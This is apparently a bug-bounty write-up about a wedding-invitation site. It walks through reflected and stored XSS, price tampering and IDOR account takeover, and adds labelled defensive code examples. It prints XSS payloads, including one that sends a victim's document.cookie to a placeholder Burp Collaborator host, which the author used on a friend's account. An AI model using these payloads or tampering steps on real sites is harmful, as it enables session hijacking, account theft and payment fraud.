From Wedding to Hacking

RyuuKhagetsu
Published in System Weakness
6 min read · Sep 2, 2023


Hello everyone, how are you all doing? I hope each and every one of you is doing well. This article might be a bit longer than the previous ones.

It all started when I was invited to my friend’s wedding through a website link. My friend had used a website that offers online invitation creation for events. I will share several sections explaining the bugs I discovered:

  1. XSS Reflected
  2. Change Price From Parameter Tampering
  3. Account Take Over
  4. XSS Stored

I hope you can easily find what you’re looking for in this article. The website I mentioned above will be referred to as “site.com”.

XSS Reflected

When I opened the invitation link sent by my friend, I landed on the URL www.site.com/my-friend-and-girl, which contained the details of their wedding invitation.

Then I started to wonder: could this invitation be customized for specific individuals, with a name like “naruto,” for example? Does this invitation allow the inclusion of personally supplied names like that? I immediately opened my terminal and used the tool “arjun” to check whether that URL accepted any other parameters.

arjun -u https://site.com/my-friend-and-girl

After waiting for a while, I obtained the parameters “tap, rayId, to, rxk”.

I chose to use the “to” parameter, so the full URL became www.site.com/my-friend-and-girl?to=naruto. And to my surprise, the name “naruto” that I entered appeared in the invitation.

Then I used this payload:

"><img src=x onerror=alert(1)>

And I successfully executed the pop-up alert.

Change Price From Parameter Tampering

After obtaining the reflected XSS, I thought, why not take a little time to explore what the website has to offer? I arrived at the pricing page, which listed premium packages for users who wanted access to additional features. I attempted to purchase a premium account without any added features.

I turned on Burp Suite and proceeded with the payment, and I got request data like this:

I found the parameter “Price:124000” and immediately changed it to “Price:10”. Then I forwarded the request.

Unfortunately, I didn’t get what I was expecting, which was a change in the price.

I tried going back to the previous page, and this time I attempted to add another feature to my purchase.

I made sure that “intercept” was on in Burp Suite and proceeded with the payment. I obtained the following request data:

Because my previous attempt to change the base price hadn’t succeeded, this time I modified all the “Price” parameters under the “Items” section to “10”.

I found that the price had dropped well below the amount I was actually supposed to pay: “1,003,976” became “129,570”.
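The tampering above works because the server accepted the per-item “Price” values from the request. As an added example (not site.com’s code), here is a checkout handler that ignores client-supplied prices and recomputes the total from its own catalog; the catalog entries and SKUs are constructed for illustration, only the 124000 base price comes from the write-up.

```javascript
// Added example, not site.com's code. Catalog prices below are constructed;
// only the 124000 "premium" price is taken from the write-up.
const CATALOG = {
  "premium": 124000,
  "custom-music": 150000,
  "rsvp": 90000,
};

// Vulnerable shape: whatever "Price" each item carries is summed as-is.
function totalTrustingClient(items) {
  return items.reduce((sum, it) => sum + Number(it.price) * it.qty, 0);
}

// Hardened: every line is priced from the server-side catalog. Unknown SKUs
// and non-positive or non-integer quantities are rejected instead of priced.
function priceOrder(items) {
  let total = 0;
  for (const it of items) {
    const unit = CATALOG[it.sku];
    if (unit === undefined) throw new Error(`unknown sku: ${it.sku}`);
    if (!Number.isInteger(it.qty) || it.qty <= 0) throw new Error(`bad qty for ${it.sku}`);
    total += unit * it.qty;
  }
  return total;
}

// Detection hook: a client price that disagrees with the catalog is a tampering
// signal worth logging, even though the server no longer uses the value.
function clientPriceMismatch(items) {
  return items.some((it) =>
    CATALOG[it.sku] !== undefined && Number(it.price) !== CATALOG[it.sku]);
}

// Constructed request shaped like the one in the write-up after every
// "Price" under "Items" was changed to 10 in Burp.
const tamperedRequest = [
  { sku: "premium", qty: 1, price: 10 },
  { sku: "custom-music", qty: 1, price: 10 },
  { sku: "rsvp", qty: 1, price: 10 },
];
```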

Account Take Over

Hmm, interesting, I thought. I went back to do deeper recon on the user dashboard section. I created a user on the website and looked at the ‘Edit Profile’ section.

I filled in the required data before pressing ‘Update Profile’, making sure Burp Suite was running.

Looking at the screenshot above, there are several interesting parameters, namely ‘id, is_admin, is_trial, is_reseller, is_premium, saldo, premium’. I tried changing all the parameters except ‘id’, but unfortunately none of them worked.

I attempted to change ‘id: 165309 <my first account>’ to ‘id: 165310 <my second account>’, and it worked: the data on my second account changed to match the first account.

To take over an account, you can request a password reset link sent to the registered WhatsApp number.

But when I returned to the dashboard, I realized there was a password form, so I filled it in immediately and got request data as follows:

I changed the ‘id’ parameter as I did above, and at this stage I could access someone else’s account without needing to request a password reset. It was as simple as setting a new password and changing the ‘id’ parameter.
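Both the profile update and the password change above fail the same way: the row to update is selected by the ‘id’ in the request body. As an added example (not site.com’s code), here is an update handler that takes the user from the session instead, refuses a mismatching body id, and only copies fields a user may edit about themselves. The user table, session store and field names are constructed; the ids 165309 and 165310 are the ones from the write-up.

```javascript
// Added example, not site.com's code. Users, sessions and the editable-field
// list are constructed; ids 165309/165310 are taken from the write-up.
const users = new Map([
  [165309, { name: "first", password: "pw1", is_admin: 0, saldo: 0 }],
  [165310, { name: "second", password: "pw2", is_admin: 0, saldo: 0 }],
]);
const sessions = new Map([["sess-A", 165309]]); // session cookie -> user id

// Fields a user may change about themselves. is_admin, is_premium, saldo and
// friends are never merged from the body, regardless of what it contains.
const SELF_EDITABLE = new Set(["name", "password"]);

// Vulnerable shape: the body's "id" picks the row, and everything is merged.
function updateProfileVulnerable(body) {
  const u = users.get(Number(body.id));
  if (!u) return 404;
  Object.assign(u, body);
  return 200;
}

// Hardened: the target user is the authenticated one. A body id that does not
// match is refused (and is exactly the IDOR attempt worth alerting on).
function updateProfile(sessionId, body) {
  const me = sessions.get(sessionId);
  if (me === undefined) return 401;
  if (body.id !== undefined && Number(body.id) !== me) return 403;
  const u = users.get(me);
  for (const [k, v] of Object.entries(body)) {
    if (SELF_EDITABLE.has(k)) u[k] = v;
  }
  return 200;
}
```

The same function serves the password form: the new password is just another whitelisted field applied to the session's user, so no body id is consulted.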

XSS Stored

I used the stored XSS here to perform cookie stealing, leading to an account takeover. I found this bug when creating a free invitation on the website with the same template as my friend’s. The invitation link is located at ‘www.site.com/test-bug’.

In the music section, you can customize the invitation by adding SoundCloud, and I tried entering a simple payload:

"><h1>lol

And it was immediately rendered on the page. I began to wonder whether this would be stored. I inserted an XSS payload:

"><img src=x onerror=prompt(document.cookie)>

I opened my digital invitation and the XSS payload fired perfectly.

I used Burp Collaborator as the server to capture the cookie that would be exfiltrated, with a simple payload like this:

"><img src=x onerror=window.location.href='http://<burp-collaborator>/?cookie='+document.cookie>

After that, I inserted it into the music form and asked my friend to open the invitation. Hehe.

In the Burp Collaborator, I received a response like the one below.

I immediately replaced all the cookies in my browser with the cookie I obtained.

I refreshed my browser, and I successfully gained access to my friend’s account.
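Both XSS bugs in this write-up (the reflected ‘to’ parameter and the stored music field) come down to untrusted text reaching HTML unencoded, and the takeover worked because the session cookie was readable from document.cookie. As an added example (not site.com’s code), here is the rendering and cookie handling that would have stopped all three; the templates, the cookie name and the allowed embed host are assumptions.

```javascript
// Added example, not site.com's code. Templates, cookie name and the allowed
// SoundCloud host are assumptions, not details from the write-up.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape, as the reflected XSS on ?to= implies: raw interpolation.
function renderGreetingVulnerable(to) {
  return `<p class="guest">Dear ${to}</p>`;
}

// Hardened: same template, encoded value. The write-up's payload becomes
// visible text instead of an <img> element with an onerror handler.
function renderGreeting(to) {
  return `<p class="guest">Dear ${escapeHtml(to)}</p>`;
}

// Music section: the value lands in an attribute, so encode it AND accept only
// an https URL on the host we intend to embed; anything else is rejected.
function renderMusicEmbed(userUrl) {
  let u;
  try { u = new URL(String(userUrl)); } catch (e) { return null; }
  if (u.protocol !== "https:" || u.hostname !== "soundcloud.com") return null;
  return `<iframe src="${escapeHtml(u.href)}"></iframe>`;
}

// The stolen cookie was read through document.cookie. With HttpOnly, injected
// script cannot read it, so the "?cookie=" exfiltration would arrive empty.
function sessionCookieHeader(value) {
  return `session=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```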

I reported it and, unexpectedly, received a reward for my report. I requested permission to write this article, and they granted it.

~ I’ve obtained permission, but they asked me to use the inspect element and modify the data as needed, because they didn’t want any accidental publication of sensitive user data or their own data. The way I found the bugs is as I reported it, but they asked me to use the latest screenshots, taken after they patched their system.

Maybe that’s all from me; hopefully it can serve as a reference for you. I’m RyuuKhagetsu, see you in the next article.
